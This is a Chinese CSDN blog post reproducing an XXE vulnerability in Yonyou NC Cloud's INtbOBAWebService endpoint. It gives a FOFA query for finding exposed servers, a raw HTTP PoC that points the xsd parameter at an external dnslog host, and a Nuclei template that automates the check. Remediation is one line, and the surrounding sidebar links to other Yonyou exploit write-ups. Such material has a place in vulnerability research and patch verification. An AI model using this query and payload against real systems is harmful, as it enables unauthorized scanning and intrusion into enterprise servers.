用友NC-Cloud INtbOBAWebService xxe漏洞

最新推荐文章于 2024-03-16 08:30:00 发布
最新推荐文章于 2024-03-16 08:30:00 发布
阅读量735 收藏 9
点赞数 12
分类专栏: 漏洞复现 文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_52204925/article/details/136350431
版权

免责声明:文章来源互联网收集整理,请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。

Ⅰ、漏洞描述

用友NC Cloud大型企业数字化平台,深度应用新一代数字智能技术,完全基于云原生架构,打造开放、互联、融合、智能的一体化云平台,聚焦数智化管理、数智化经营、数智化商业等三大企业数智化转型战略方向,提供涵盖数字营销、财务共享、全球司库、智能制造、敏捷供应链、人才管理、智慧协同等18大解决方案,帮助大型企业全面落地数智化。

该系统/uapws/service/nc.itf.tb.oba.INtbOBAWebService接口存在XXE漏洞,恶意攻击者可能会利用该命令在xml中构造恶意命令,可能会导致服务器失陷或者敏感信息泄露。

Ⅱ、fofa语句

body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"

Ⅲ、漏洞复现

POC

GET /uapws/service/nc.itf.tb.oba.INtbOBAWebService?xsd=http://pwmguqyets.dgrh3.cn/win2.xml HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)
Connection: close
Accept: text/plain, */*; q=0.01
Cache-Control: no-cache
Pragma: no-cache
Accept-Encoding: gzip

1、构造数据包,访问dnslog

2、查看DNSlog记录

Ⅳ、Nuclei-POC

id: yonyou-U8-INtbOBAWebService-xml

info:
  name: 该系统/uapws/service/nc.itf.tb.oba.INtbOBAWebService接口存在XXE漏洞,恶意攻击者可能会利用该命令在xml中构造恶意命令,可能会导致服务器失陷或者敏感信息泄露。
  author: WLF
  severity: high
  metadata: 
    fofa-query: body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"
variables:
  filename: "{{to_lower(rand_base(10))}}"
  boundary: "{{to_lower(rand_base(20))}}"
http:
  - raw:
      - |
        GET /uapws/service/nc.itf.tb.oba.INtbOBAWebService?xsd=http://{{interactsh-url}}/win2.xml HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)
        Connection: close
        Accept: text/plain, */*; q=0.01
        Cache-Control: no-cache
        Pragma: no-cache
        Accept-Encoding: gzip

    matchers:
      - type: word
        part: interactsh_protocol # Confirms the DNS Interaction
        words:
          - "dns"

Ⅴ、修复建议

升级至安全版本

Love Seed
关注
  • 12
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
用友NC Cloud IUpdateService接口存在XXE漏洞
nnn2188185的博客
01-12 210
用友NC Cloud IUpdateService接口存在XXE漏洞
用友-nc-cloud runscript接口sql注入漏洞
最新发布
weixin_43567873的博客
03-20 213
用友-nc-cloud runscript接口sql注入漏洞
用友OA/NC/NCCloud漏洞集合
qq_53229503的博客
08-16 7901
用友OA/NC/NCCloud漏洞集合
XXE漏洞详解【内含vulnhub靶场XXE Lab:1详解】
07-30
内含xxe漏洞原理,以及该漏洞的多种利用方式,同时根据八个具体案例详细描述漏洞的利用方式。 【想要搭建vulnhub内靶场可关注博主,然后私聊我哦】 同时内含vulnhub中xxe lab:1靶场的过关记录 渗透思路: 由于网站信息什么都没有给出,首先判断靶场搭建的ip【实在判断不出来可以nmap扫一下,找到开放80端口的ip】 得到ip后,可以使用burpsuite进行目录爬取,得到sitemap后就可以对相应可疑站点进行测试,由于该靶场为xxe漏洞靶场,找到对应的登录页面抓包进行构造payload进行测试,其中具体构造payload并找到对应flag见pdf所示。 资源使用人群:前后端有一定了解,具备一些安全方面知识,但不多,保姆级教程,只要你想学就能学会。 工具:忍者渗透测试系统【burpsuite,nmap,base32解密,php在线运行环境,base64解密,cmd5在线平台】
用友NC 漏洞汇总(转载)
xiaobai_20190815的博客
11-21 8758
用友NC 漏洞汇总
漏洞复现 || 畅捷通T+ net反序列化
失心少年
07-05 357
技术文章仅供参考,任何个人和组织使用网络应当遵守宪法法律,遵守公共秩序,尊重社会公德,不得利用网络从事危害国家安全、荣誉和利益,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他!畅捷通 T+ 存在.net反序列化漏洞,未经过身份认证的攻击者可以通过构造恶意的序列化请求在目标服务器上执行任意命令。1.使用如下POC请求dnslog显示id不能为空即可。
用友NC Cloud存在前台远程命令执行漏洞
holyxp的博客
07-22 475
用友网络是全球领先的企业与公共组织软件、云服务、金融服务提供商。提供营销、制造、财务、人力等产品与服务,帮助客户实现发展目标,进而推动商业和社会进步。
用友NC uapjs RCE漏洞复现(CNVD-C-2023-76801)
0xSec
06-29 9531
用友NCNC Cloud系统存在任意文件上传漏洞,攻击者可通过uapjs(jsinvoke)应用构造恶意请求非法上传后门程序,此漏洞可以给NC服务器预埋后门,从而可以随意操作服务器
用友NC Cloud及YonBIP PMCloudDriveProjectStateServlet JNDI注入漏洞
weixin_52204925的博客
01-31 880
用友NC Cloud及YonBIP PMCloudDriveProjectStateServlet JNDI注入漏洞
用友 NC Cloud jsinvoke 任意文件上传
败在我手中之敌,从来不会被我视为对手,我给你时间追赶,直至你遥望不见。
12-01 760
用友 NC Cloud 中存在 jsinvoke 接口的任意文件上传漏洞,攻击者可以通过利用此漏洞向系统上传任意恶意文件。
用友NC NCCLOUD BIP ldap公共入口uapjs漏洞补丁
Karka_的博客
03-16 833
补丁名称问题描述发布时间产品版本领域模块nc65_sysFunctionManager下标越界和空指针合集补丁NC6.5集团采供库存管理nc633_ldap公共入口漏洞补丁nc633_ldap公共入口漏洞补丁NC6.33UAP基础技术框架nc65_ldap公共入口漏洞补丁nc65_ldap公共入口漏洞补丁NC6.5UAP基础技术框架ncc1909ldap公共入口漏洞补丁ncc1909ldap公共入口漏洞补丁应用平台基础技术框架。
105-web漏洞挖掘之XXE漏洞1
08-03
1. 示例中是一般实体引用(即“&[name] 2. 示例中若使用FILE等其他协议,不一定是发起网络请求(源代码中定义的方法名 3. 不同的编程语言和XML解
java8看不到源码-Apache-OFBiz-XXE:ApacheOFBiz<16.11.04的XXE注入(文件泄露)漏洞利用
06-04
XXE Apache OFBiz < 16.11.04 的 XXE 注入(文件泄露)漏洞利用 信息 16.11.04 版本之前的 Apache OFBiz 包含两个不同的 XXE 注入漏洞。 每个漏洞的公开披露可以在下面找到: [1] [2] 此漏洞利用针对链接 1 中...
WebGoat8-xxe注入漏洞分析
09-15
WebGoat8-xxe注入漏洞分析
漏洞复现】用友NC Cloud portal/file接口任意文件读取漏洞
做自己喜欢的事,并将其发挥到极致!
01-23 786
用友 NC Cloud,大型企业数字化平台, 聚焦数字化管理、数字化经营、数字化商业,帮助大型企业实现 人、财、物、客的全面数字化,从而驱动业务创新与管理变革,与企业管理者一起重新定义未来的高度。为客户提供面向大型企业集团、制造业、消费品、建筑、房地产、金融保险等14个行业大类,68个细分行业,涵盖数字营销、智能制造、财务共享、数字采购等18大解决方案,帮助企业全面落地数字化。用友NC Cloud portal/file接口存在任意文件读取漏洞
【网络安全SRC相关内容总结】
淋淋颖的博客
12-28 972
静态绕过使用强加密/压缩:XOR, base64,AES DES,商用算法...混淆加密:LLVM OLLVM...隐藏导入导出表:动态调用Win减少文件熵:分离加载,IPv4等资产保护壳:VM,自写,商用模拟正常软件:签名、文件名、图标、属性信息、资源等动态绕过沙箱和虚拟化隔离进程注册内核回调ETW日志检测堆栈跟踪检测进程链检测(黑加黑)利用AMSI接口沙箱/虚拟对抗延迟执行检测无法虚拟化的设备检测系统开机时间检测物理内存是否大于4G检测文件名是否修改检测进程信息。
史上最全!用友NC 漏洞汇总
2301_80115097的博客
12-01 697
参数可以读取下列所有文件,在某些情况下可以读取利用目录穿越可读取/etc/passwd等文件。版本存在未授权文件上传漏洞,攻击者可以未授权上传任意文件,进而获取服务端控制权限。版本存在反序列化漏洞,攻击者可以执行系统命令,获取服务端权限。账户密码随便填,抓包将返回包0改为1,即可任意用户登录。在其中有个接口可以获取数据库账户密码,不过是老版本了。文件管理登录页面对用户名参数没有过滤,存在。ncDecode---用友nc数据库密码解密。存在远程命令执行漏洞,通过。用友NC-OA漏洞合集。
【1day】复现用友 NC NCFindWeb大型企业数字化平台及用友系统uapjs(jsinvoke)任意文件上传漏洞
记录并分享学习安全的知识点..
07-25 978
用友NC是一款企业级ERP软件。作为一种信息化管理工具,用友NC提供了一系列业务管理模块,包括财务会计、采购管理、销售管理、物料管理、生产计划和人力资源管理等,帮助企业实现数字化转型和高效管理。用友NCNC Cloud系统存在任意文件上传漏洞,攻击者可通过uapjs(jsinvoke)应用构造恶意请求非法上传后门程序,此漏洞可以给NC服务器预埋后门,从而可以随意操作服务器。
泛微oa e-cology xxe 漏洞
08-17
泛微OA是一种常见的企业办公自动化系统,而XXE(XML外部实体注入)漏洞是指攻击者通过注入恶意的外部实体来读取或利用系统中的敏感数据。 泛微OA的XXE漏洞是由于系统对外部XML实体的处理不当所导致的。攻击者可以通过构造恶意的XML实体并将其发送给系统,然后利用系统对外部实体的解析不当来读取系统中的文件,包括敏感的配置文件、数据库信息。攻击者还可以通过XXE漏洞发起钓鱼攻击或者是向系统发送恶意的请求来进一步导致系统的安全漏洞。 为了防范泛微OA的XXE漏洞,建议以下几点: 1. 进行安全审计:对泛微OA系统进行定期的安全审计,通过检测系统中的漏洞和弱点,及时修复存在的XXE漏洞。 2. 模板限制:在处理外部XML实体时,应限制或阻止对外部实体的解析,避免可能的XXE攻击。可以通过设置合适的解析选项,限制对外部实体的访问权限。 3. 输入验证与过滤:对于用户输入的数据,应进行合理的验证和过滤,确保输入的内容符合预期格式,避免恶意的外部实体注入。 4. 更新补丁:定期保持泛微OA系统的更新与升级,及时安装官方发布的补丁和修复漏洞的版本。 5. 安全意识培训:加强企业员工的安全意识培训,提高他们对XXE漏洞及其他安全威胁的认识,避免因无意中点击恶意链接或下载恶意附件而导致漏洞的利用。 通过以上措施,可以有效地减少泛微OA中的XXE漏洞,提升系统的安全性。及早识别并修复漏洞,有助于保护企业的机密信息以及防止潜在的安全威胁发生。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值